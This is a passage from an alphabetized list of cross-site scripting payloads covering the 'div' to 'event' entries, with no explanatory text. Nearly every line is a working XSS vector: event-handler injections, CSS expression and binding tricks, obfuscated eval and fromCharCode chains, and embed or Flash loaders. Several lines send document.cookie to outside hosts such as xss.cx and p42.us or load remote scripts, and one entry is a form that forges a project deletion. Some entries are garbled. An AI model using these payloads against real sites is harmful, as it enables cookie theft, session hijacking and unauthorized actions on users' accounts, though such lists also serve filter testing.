- div data-toggle=tooltip title=’I am atooltip!’some text /div
- </div><div id=”x”>AAA</div>
- <div draggable=”true” ondragstart=”event.dataTransfer.setData(‘text/plain’, ‘Evil data’)><h3>DRAG ME!!</h3></div>
- <div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>
- <div><embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/</div><div id=”x”>AAA</div>
- <div> <embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/ </div><div id=”x”></div>
- <div id=”alert(/@0x6D6172696F/)” style=”x:expression(eval)(id)”>
- <div id=”confirm(2)” style=”x:expression(eval)(id)”>
- <div id=d><div style=”font-family:’sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B’”>X</div></div>
- <div id=d><div style=”font-family:’sans\27\3B color\3Ared\3B’”>X</div></div>
- <div id=d><div style=”font-family:’sans\27\3B color\3Ared\3B’”>X</div></div> <script>with(document.getElementById(“d”))innerHTML=innerHTML</script>
- <div id=”div1"><input value=”``onmouseover=alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
- <div id=”div1"><input value=”``onmouseover=javascript:alert(1)”></div> <div id=”div2"></div>
- <div id=”div1"><input value=”``onmouseover=javascript:alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
- <div id=d><x xmlns=”><body onload=alert(1)”><script>d.innerHTML=����</script>
- <div id=d><x xmlns=”><iframe onload=alert(1)”></div>
- <div id=d><x xmlns=’”><iframe onload=alert(2)//’></div>
- <div id=d><x xmlns=”><iframe onload=javascript:alert(1)”></div> <script>d.innerHTML=d.innerHTML</script>
- <div id=”myxsxxcd” style=”color:red;display:none” title=”if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}”>
- <div id = “x”></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
- <div id=”xss” onwebkittransitionend=”alert(1)” style=”-webkit-transition: width .1s;”></div>
- <DIV id=XSS STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV id=XSS STYLE=”binding: url(javascript:alert(‘XSS’));”>
- <div id=”xss” style=”float:left” onfocus=”alert(1)”>
- <div id=”xss” style=”-ms-block-progression:bt” onfocus=”alert(1)”>
- <div id=”xss” style=”-ms-layout-flow:vertical-ideographic” onfocus=”alert(1)”>
- <DIV id=XSS STYLE=”width: expression(alert(‘XSS’));”>
- <div id=”x”>x</div> <xml:namespace prefix=”t”> <import namespace=”t” implementation=”#default#time2"> <t:set attributeName=”innerHTML” targetElement=”x” to=”<imgsrc=x:xonerror=javascript:alert(1)>”>
- <div id=”x”>x</div> <xml:namespace prefix=”t”> <import namespace=”t” implementation=”#default#time2"> <t:set attributeName=”innerHTML” targetElement=”x” to=”<img src=x:x onerror =javascript:alert(1)>”>
- <div id=”x”>XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
- <div id=”x”>XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
- <div>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
- ‘“>><div><meter onmouseover=”alert(1)”</div>”
- <div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
- div ng-app ng-cspng-focus=”x=$event.view.window;x.”
- <div onactivate=”alert(1)” id=”xss” style=”overflow:scroll”></div>
- <div onactivate=alert(‘Xss’) id=xss style=overflow:scroll>
- <div onbeforescriptexecute=”alert(1)”></div>
- <div onclick=”alert(‘xss’)”>
- <div onfocus=”alert(1)” contenteditable tabindex=”0" id=”xss”></div>
- <div onfocus=”alert(1)” id=”xss” style=”display:table”>
- <div onfocus=alert(‘xx’) id=xss style=display:table>
- <div onmouseenter=”alert(‘xss’)”>
- <div onmousemove=”alert(200)” src=”xxxx”>
- <div/onmouseover=’alert(1)’>renwa
- <div/onmouseover=’alert(1)’> style=”x:”>
- <div/onmouseover=’alert(1)’> style=”x:”>
- <div/onmouseover=’alert(1)’>X
- <div onmouseover=’alert(1)’>DIV</div>
- <div onmouseover=”alert(‘XSS’);”>,
- <div/onmouseover=’confirm(1)’> style=”x:”>
- <div onmouseover=’confirm(1)’>DIV</div>
- <div onmouseover=”document.vulnerable=true;”>
- <div onmouseover=prompt(“1”)>renwa
- div ref=mes.bind=”$this.me.ownerdefaultView.” /div
- <div><script>alert(1)
- →</div><script src=/test.js></script>
- <div>”src=data:,alert%281%29></script><script x=”</div>
- <div>”src=data:,alert%2824%29></script><script x=”</div>
- <div style=”width:expression(alert('1'))”>1</div>
- <div style=”width:\0065xpression(alert(/1/))”>1</div>
- <div style=”\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;”>XXX</div><div style=”[a]color[b]:[c]red”>XXX</div>
- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>
- <div style=”animation-name:x” onanimationstart=”alert(1)”></div>
- <DIV STYLE=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
- <;DIV STYLE=”;background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
- <DIV STYLE=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE=”background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029 029">
- <;DIV STYLE=”;background-image: url(&;#1;javascript:alert(‘;XSS’;))”;>;
- <DIV ?STYLE=”background-image: ?url(javascript:alert(‘XS ?S’))”>
- <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE=”background-image: url(javascript:confirm(5))”>
- <div STYLE=”background-image: url(javascript:document.vulnerable=true;)”>
- <div style=”background-image:url(javascript:alert(‘1’))”>
- <DIV+STYLE=”background-image: url(javascript:alert(1))”>
- <div style=”background-image:url(javascript:alert(document.cookie))”>
- <DIV STYLE=”background-image: url(javascript:alert(‘X1SS’))”>
- <;DIV STYLE=”;background-image: url(javascript:alert(‘;XSS’;))”;>;
- <DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
- <DIV STYLE=”background-image: url(javascript:alert(‘XSS’));”>
- <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE=”background-image: url(javascript:alert(XSS))”>
- <DIV STYLE=”background-image: url(javascript:confirm(5))”>
- <div style=”background-image: url(javascript:document.vulnerable=true;);”>
- <div STYLE=”background-image: url(javascript:document.vulnerable=true;)”>
- <DIV STYLE=”background-image: url(javascript:javascript:alert(1))”>
- <div style=”background-image:url(<script>alert(document.cookie)</script>)”>
- <div style=”background:url(/f#oo/;color:red/*/foo.jpg);”>X
- <div style=”background:url(/f#[a]oo/;color:red/*/foo.jpg);”>X</div>
- <div style=”background:url(/f#oo/;color:red/*/foo.jpg);”>X
- <div style=”background:url(/foo/;color:red/*/foo.jpg);”>X
- <div style=”background:url(http://foo.f/f oo/;color:red/*/foo.jpg);”>X</div>
- <div style=behavior:url(“ onclick=alert(1)//”>XSS’OR
- <div style=”behaviour:url(‘http://www.how-to-hack.org/exploit.html');">
- <DIV STYLE=”behaviour: url(‘http://www.how-to-hack.org/exploit.html');">
- <DIV STYLE=”behaviour: url(‘http://xss.ha.ckers.org/exploit.htc');">
- <div style=”behaviour: url([link to code]);”>
- <div style=”binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
- <div style=”binding: url([link to code]);”>
- <div style=”color: ‘<’; color: expression(alert(‘XSS’))”>
- <div style=”color: expression(alert(‘XSS’))”>
- <div style=”color:rgb(''x:expression(alert(1))”></div>
- <div style=”color:rgb(‘’�x:expression(alert(1))”></div>
- <Div style = “color: rgb (‘’ & # 0; x: expression (alert (1))”> </ div>
- <div style=”color:rgb(‘’�x:expression(alert(URL=1))”></div>
- <div style=”color:rgb(‘’�x:expression(confirm(URL=1))”></div>
- <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
- <div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>
- <div style=content:url(%(svg)s)></div>
- <div style=”display:none”></div><div style=”display:none” t=”1" e=”style\/<'"></div>"/ \""/<img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\>>
- <div style=”display:none” style=”behavior:url(‘?1’)”
- <div style=”display:none” style=”behavior:url(‘?1’)” onreadystatechange=”alert(1)”>1</div>
- <div style=”font-family:’foo ;color:red;’;”>LOL
- <div style=”font-family:’foo ;color:red;’;”>XXX
- <div style=”font-family:’foo[a];color:red;’;”>XXX</div>
- <div style=”font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
- <div style=”font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
- <div style=”font-family:’foo ;color:red;’;”>XXX
- <div style=”font-family:foo}color=red;”>XXX
- <div style=”font-family:foo}color=red;”>XXX</div>
- <div style = “list-style-image:url(javascript:alert(xSS))”>
- <div style=”list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
- <div style=”list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
- <div style=”-moz-binding:url(http://xssor.io/0.xml#xss);x:expression((window.r!=1)?eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,48,46,106,115));document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);window.r=1;'):1);"id="inject">
- <div style=”-ms-scrolllimit:1px;overflow:scroll;width:1px”
- <div style=”-ms-scroll-limit:1px;overflow:scroll;width:1px” onscroll=”alert(1)”>
- <div style=”-ms-scroll- limit:1px;overflow:scroll;width:1px” onscroll=alert(‘xss’)>
- <div style=”-ms-scroll-limit:1px;overflow:scroll;width:1px” onscroll=alert(‘xss’)>
- <DIV STYLE_NeatHtmlReplace=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE_NeatHtmlReplace=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE_NeatHtmlReplace=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE_NeatHtmlReplace=”width: expression(alert(‘XSS’));”>
- <div style=overflow:-webkit-marquee onscroll=alert(1)>
- <div style=”overflow:-webkit-marquee” onscroll=”alert(1)”></div>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onclick=”alert(52)”>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>?
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>?
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button><div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”confirm(1)”>x</button>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”confirm(1)”>x</button>?f
- <div style=”visibility:hidden” style=”behavior:url(‘?2’)”
- <div style=”visibility:hidden” style=”behavior:url(‘?2’)” onreadystatechange=”alert(2)”>2</div>
- <div style=”-webkit-user-modify:read-write” onfocus=”alert(1)” id=”xss”>
- <div style=”-webkit-user-modify:read-write-plaintext-only” onfocus=”alert(1)” id=”xss”>
- <div style=”width:\0065xpressio\6e(alert(/1/))”>1</div>
- <div style=”width:\0065xpression(alert(/1/))”>1</div>
- <div style=width:1px;filter:glow onfilterchange=alert(1)>x
- <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
- <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
- <div style=”width:exp/**
- <div style=”width:expression(alert(‘1’));”>
- <div style=”width:exp/****/ression(alert(/1/))”>1</div>
- <div style=”width:expression(alert(/1/))”>1</div>
- <div style=”width:expression(alert(‘1’))”>1</div>
- <DIV STYLE=”width:expression(alert(‘anyunix’));”>
- <div style=”width:expression(alert(‘x123ss’));”>
- <DIV STYLE=”width: expression(alert(‘X2SS’));”>
- <;DIV STYLE=”;width: expression(alert(‘;XSS’;));”;>;
- <DIV STYLE=”width: ?expression(alert(‘XSS’));”>
- <DIV STYLE=”width: expression(alert(‘XSS’));”>
- <DIV STYLE=”width: expression(alert(XSS));”>
- <div style=”width:expression(confirm(1))”>X</div>
- <div/style=”width:expression(confirm(1))”>X</div>
- <div/style=”width:expression(confirm(1))”>X</div> {IE7}
- <DIV STYLE=”width: expression(confirm(5));”>
- <div style=”width: expression(document.vulnerable=true;);”>
- <div STYLE=”width: expression(document.vulnerable=true);”>
- <DIV STYLE=”width:expression(javascript:alert(1));”>
- <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
- <div style=”x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))”>Joker</div>
- <div style=”x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
- <div style=”x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))”>Joker</div>
- <div style=’x:anytext/**/xxxx/**/n(alert(1)) (“\”))))))expressio\”)’>aa</div>
- <div style=’x:anytext/**/xxxx/**/n(confirm(1)) (“\”))))))expressio\”)’>aa</div> //
- <div style=”x:expression(alert(1))”>Joker</div>
- <div style=”x:expression((window.r==1)?’’:eval(‘r=1;
- <div style=”x:expression((window.r==1)?’’:eval(‘r=1;
- <div style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
- <div/style==”x onclick=alert(1)//”>XSS’OR
- <div style=xss:expres\sion(if(!window.x){alert(‘xss’);window.x=1;})></div>
- <div style=x:x(“ onclick=alert(1)//”>XSS’OR
- <div style=”z:exp/*anything*/res/*here*/sion(alert(1))” />
- /div /template
- <div title=”%></script>"<img src=1 onerror=confirm(1)>”></div>
- div type=underscore/template % % /div
- <div=’x="'><iframe/onload=alert(1)>’>
- dnd →<script>alert(9)</script><! — %20
- doc.documentElement.innerHTML+=’’;
- doc=document.implementation.createHTMLDocument(‘&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;’);
- doc = new ActiveXObject(“htmlFile”);
- <!doctype”:
- <!DOCTYPE x[<!ENTITY x SYSTEM “http://html5sec.org/test.xxe">]><y>&x;</y>
- “;document.body.addEventListener(“DOMActivate”,alert(1))//
- “;document.body.addEventListener(“DOMActivate”,confirm(1))//
- “;document.body.addEventListener(“DOMActivate”,prompt(1))//
- document.body.appendChild(f);
- document.body.appendChild(fo);
- document.body.appendChild(fr);
- document.body.innerHTML=(‘<\000\0i\000mg src=xx:x onerror=alert(1)>’)
- document.body.innerHTML=(‘<\000\0i\000mg src=xx:x onerror=confirm(1)>’)
- document.body.innerHTML=’”onerror=”alert(1)”>’.anchor(‘“><img src=’);
- document.body.setAttribute(‘onclick’,’go();’);
- “+document.cookie+”
- document.cookie=’xss=xss;domain=.cx.’
- ‘() {‘document.createElement(‘img’).src=’javascript:while(1){}’
- [document.domain].find(alert)>
- document.domain=’qq.com’
- document.getElementById(‘form_xss’).submit();
- document.getElementById(“iframe1”).contentDocument.getElementsByName(“owner”)[0].getElementsByTagName(“a”)[0].href;
- document.getElementById(“iframe2”).contentDocument.forms[1].token.value;
- document.getElementById(“iframe”).contentDocument.getElementById(“projects-dropdown”);
- document.getElementById(“test”).innerHTML =” \u003cimg src=1 onerror=alert(/xss/)\u003e”;
- document.getElementById(‘text’).innerHTML = ‘Click Here Again!’;
- document.getElementById(‘text’).setAttribute(‘style’,’color:red;’);
- document.getElementById(‘xss_content’).value = content;
- document.getElementsByName(“login”).item(0).src = http://xss.cx/
- document.getElementsByTagName(‘body’)[0].appendChild(form);
- document.getElementsByTagName(‘body’)[0].appendChild(frame);
- document.location=”http://xss.cx/default.aspx?c=" + document.cookie
- document.location=unescape(“%19Jav%09asc%09ript:https ://foobar/%250Aconfirm%25281%2529”)
- ‘},document.location=window.name+’//’+
- document.location=window.name+’//’+
- document.location=window.name%2b%27//%27%2b
- $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
- $=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
- \”;document.vulnerable=true;;//
- &{document.vulnerable=true;};
- document.write(a);
- document.write(doc.documentElement.innerHTML)
- document.write(‘<form><input id=p type=password></form>’);setTimeout(“alert(document.getElementById(‘p’).value)”, 50)
- “;document.write(‘<img sr’%2b’c=http://p42.us/x.png?'%2bdocument['cookie']%2b'>');"
- “;document.write(‘<img src=http://p42.us/x.png?'%2bdocument.cookie%2b'>');"
- document.write(‘<img src=”<iframe/onload=confirm(1)>\0">’)
- document.writeln(‘<form width=”0" height=”0" method=”POST” action=”’+x+’adminAdvanced.do”>’); document.writeln(‘<input type=”hidden” name=”token” value=”’ + token + ‘“ />’); document.writeln(‘<input type=”hidden” name=”deletebtn” value=”Delete+project” />’); document.writeln(‘</form>’); document.forms[0].submit();
- document.write(‘<? oncl?ck=alert(1)>asd</?>’.toUpperCase()
- document.write(“<s”,”crip”,”t>al”,”ert(“,”1)”,”</s”,”cript>”)
- document.write(“<scr”+”ipt language=javascript src=http://localhost/></scr"+"ipt>");
- document.write(`<script>//# sourceMappingURL=https://pkav/?${escape(document.cookie)}</script>`)
- ‘document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))’
- document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))
- document.write(String.fromCharCode(60,12,62)); ==== document.write(String.fromCharCode(<script src=http://xss.me/1></script>;));
- ‘document.write(String.fromCharCode(‘+”,”.join([str(ord(n)) for n in payload])+’))’
- document.write(String.fromCharCode(‘+”,”.join([str(ord(n)) for n in payload])+’))
- →<d/ /ondrag=co\u006efir\u006d(2)>hello.
- (double reflection, single input $p)
- d=x.getImageData(t*3,Y=t*120%82,2,D=3).data
- dXJjZSk=
- $$=’e’
- %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
- E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
- ? (%E2%84%AA).toLowerCase() => k
- %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80
- % E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%
- (E=[A=[],g=!A+A][g[E=-~-~++A]+({}+A) [C=!!A
- (E=[A=[],g=!A+A][g[E=-~-~++A]+({}+A) [C=!!A+g,a=C[A]+C[+!A],A]+a])() [g[A]+g[A+A]+C[E]+a](A)
- e; alert(document.cookie); var foo=i
- eat backlash: %bb”alert(1) (GBK charset)
- echo $_GET[“p”];
- echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
- echo(‘IPT>alert(\”XSS\”)</SCRIPT>’); ?>
- <;? echo(‘;<;SCR)’;;
- <? echo(‘<SCR)’;
- <? echo(‘<scr)’; echo(‘ipt>alert(“XSS”)</script>’); ?>
- <? echo(‘<scr)’; echo(‘ipt>alert(\”XSS\”)</script>’); ?>
- <? echo(‘<SCR)’;echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
- <? echo(‘<SCR)’;echo(‘IPT>document.vulnerable=true</SCRIPT>’); ?>
- echo “<script>alert()</script>”
- echo “<script>alert()</script>” >> /tmp/bin.bin
- echo str_ireplace(“<script”, “”, $_GET[“q”]);
- echo str_ireplace(“<script”,”InvalidTag”, $_GET[“r”]);
- echo str_ireplace(“<script”,”<InvalidTag”, $_GET[“s”]);
- echo str_replace(“ “, “”, $_GET[“q”]);
- #eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
- e = document.createElement(‘input’);
- e.id = ‘xss_content’;
- ??�E��img src=a onerror=javascript:alert(‘test’)>�K?��
- E”><img src=”x:x” onerror=”alert(0)”>
- element[attribute=’<img src=x onerror=alert(‘XSS’);>
- <embed%20allowscriptaccess=always+src=https:html5sec.org/test.swf
- <embed allowscriptaccess=”alwalwaysays” src=”test.swf”>
- <embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/
- <embed code=evil.swf allowscriptaccess=always>
- <embed/code=//goo.gl/nlX0P?
- <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
- <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf"allowscriptaccess=always>
- <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
- <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
- <Embed code = “http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess = always>
- <embed code=”http://xss.cx/xss.swf" allowscriptaccess=always></embed>
- <embed code=javascript:javascript:alert(1);></embed>
- <embed code=%(scriptlet)s></embed>
- <embed name=a flashvars=’autoplay=true&file=”})\”)-(alert=alert(1)))}catch(e){}//’ allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
- <embed name=’alert(1)-’ allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
- <embed onfocus=’popup=1;’><img
- <embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>
- <embed src=/aaa>
- <embed src=”data:image/svg+xml;>
- <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
- <embed src=”data:text/html;base64,%(base64)s”>
- <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
- <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></embed>
- <embed src=data:textml;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
- <embed src=evil.swf allowscriptaccess=always>
- <embed/src=//goo.gl/nlX0P>
- <embed/src=��//goo.gl/nlX0P��>
- <Embed / src = // goo.gl/nlX0P>
- <EMBED SRC=”http://3w.org/XSS/xss.swf" ></EMBED>
- <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
- <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- <EMBED SRC=”http://hacker.com/xss.swf" AllowScriptAccess=”always”>
- <;EMBED SRC=”;http://ha.ckers.org/xss.swf"; AllowScriptAccess=”;always”;>;<;/EMBED>;
- <EMBED SRC=”http://ha.ckers.org/xss.swf" AllowScriptAccess=”always”></EMBED>
- <EMBED SRC=”http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>
- <EMBED SRC=”http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf”AllowScriptAccess=”always”></EMBED>
- EMBED SRC=”http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf” AllowScriptAccess=”always”></EMBED>
- <embed src=https://evil/>
- <embed src=”javascript:alert(1)”>
- <embed src=javascript:alert(1)> *
- <embed src=javascript:alert(1)>
- <embed src=javascript:alert(1)>
- <embed src=javascript:alert(162)>
- <embed src=”javascript:alert(1)”></embed>
- <embed src=”javascript:alert(1)”></embed> // Firefox only
- <embed src=”javascript:alert(1)”></embed> // O10.10, OM10.0, GC6, FF
- <embed src=%(jscript)s></embed>
- ?embed src=”lol.swf” width=”1337" height=”1337" FlashVars=”param=something¶m2=somethingelse¶m3=lol”?
- <embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
- <embed src=URL onload=alert(‘xss’)>
- <embed src=/x//alert(1)><base href=”javascript:\
- <embed type=”image” src=%(scriptlet)s></embed>
- <embed width=500 height=500 code=”data:text/html,<script>%(payload)s</script>”>
- <embed width=500 height=500 code=”data:text/html,<script>%(payload)s</script>”></embed>
- Ember.run(null, alert, 9)
- e.name = ‘c’;
- encodeURIComponent(''-alert(1)-'')
- encodeURIComponent(''-prompt(1)-'')
- encodeURIComponent('userinput')
- encodeURIComponent (‘userinput’)
- <![endif] →
- “;escape=eval;//
- e.type = ‘hidden’;
- eval(0+location.string) //or 1+location.string
- eval(0x258da033.toString(30))(1)
- eval(“1+1?>”);eval(“1+1</script>”);eval(“1+1//?>”);
- eval(1558153217..toString(36))(1)
- eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
- eval(630038579..toString(30))(1)
- eval(a+b+c+d);
- eval(“ale” + (!![]+[])[+!+[]]+(!![]+[])[+[]])(1)
- eval(‘ale’+’rt(0)’);
- eval(`${`${`${`${`${`a`}`}`}`}`}${`${`${`${`${`l`}`}`}`}`}${`${`${`${`${`e`}`}`}`}`}${`${`${`${`${`r`}`}`}`}`}${`${`${`${`${`t`}`}`}`}`}${`${`${`${`${`(1)`}`}`}`}`}`)
- eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(1)`);
- eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));
- eval.call(this,unescape.call(this,location))
- eval(Dec(‘203041263543203’,’2549'));
- eval(document.referrer.slice(10));
- eval(JSON.stringify({a:1},null,’alert(1)//’))
- eval(location.hash.slice(1));
- eval(location.hash.slice(1))//
- eval(location.hash.slice(1))
- eval(location.hash.slice(1)>#alert(1)
- “);eval(name+”
- “+eval(name)+”
- eval(name)
- eval+name
- eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))
- eval(String.raw({[`raw`]:`aet(1)`},…`lr`))
- eval(String.raw({raw:’aet(1)’},’l’,’r’))
- eval(Symbol(‘)-alert(1’).toString())
- eval(‘this.a;alert(1);//=”bbb”;’)
- eval(‘this.a=”bbb”;alert(1);//”’)
- $eval((toString()).constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)) }}
- eval(‘\\u’+’0061'+’lert(1)’)
- _=eval,__=unescape,___=document.URL,_(__(___))
- “;eval(unescape(location))//# %0Aalert(0)
- “;eval(unescape(location))//#%0Aprompt(0)
- %”;eval(unescape(location))//#%0Aprompt(0)
- eval(URL.slice(-8))>#alert(1)
- eval(“\x61\x6c\x65\x72\x74\x28\x31\x29a?)
- Event.prototype[0]=’@garethheyes’,Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert
- Event.prototype[0]=’@garethheyes’,Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm
- Event.prototype.toString=[].join;Event.prototype.length=1;Event.prototype[0]=1;onhashchange=alert;onmessage=alert;
- <event-source src=”%(event)s” onload=”javascript:alert(1)”>
